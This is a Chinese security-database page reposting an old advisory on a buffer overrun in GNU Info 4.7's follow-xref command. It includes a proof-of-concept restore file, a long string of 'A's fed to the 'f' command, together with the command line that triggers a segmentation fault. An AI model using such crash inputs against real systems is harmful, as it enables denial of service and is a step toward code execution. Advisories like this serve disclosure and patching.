GNU Info 4.7 – Follow XRef Buffer Overrun

GNU Info 4.7 – Follow XRef Buffer Overrun

漏洞ID 1054552 漏洞类型
发布时间 2004-08-06 更新时间 2004-08-06
图片[1]-GNU Info 4.7 – Follow XRef Buffer Overrun-安全小百科CVE编号 N/A
图片[2]-GNU Info 4.7 – Follow XRef Buffer Overrun-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24355
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10882/info

GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command.

An attacker may exploit this vulnerability by crafting a malicious Info script that is sufficient to trigger the issue.

Although this vulnerability is reported to affect info version 4.7-2.1, other versions might also be affected.

The following can be saved to a file and called as:
info info --restore=info.bug to create a segmentation fault.

[START info.bug]
gExpert Info

fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[END info.bug]

相关推荐: osCommerce osCsid Parameter Cross-Site Scripting Vulnerability

osCommerce osCsid Parameter Cross-Site Scripting Vulnerability 漏洞ID 1099114 漏洞类型 Input Validation Error 发布时间 2003-12-17 更新时间 2003-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享